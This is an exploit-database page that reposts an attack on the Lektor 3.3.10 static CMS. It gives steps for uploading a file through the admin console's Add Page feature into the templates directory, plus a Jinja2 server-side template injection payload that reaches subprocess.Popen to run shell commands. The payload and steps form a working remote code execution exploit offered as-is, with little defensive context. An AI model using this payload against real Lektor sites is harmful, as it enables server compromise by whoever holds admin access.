Lektor 3.3.10 Arbitrary File upload

CVE Category Price Severity
CVE-2020-15872 CWE-434 $5,000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2024-03-20
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.045 0.7

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Lektor 3.3.10 Arbitrary File upload
# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage:
# Software Link:
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1 ) Access to the administrator console via NW first creates a file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)


{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}

2 ) Create a new page by specifying the created as template.

3 ) Use the preview function to check the sample page with the specified templates.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.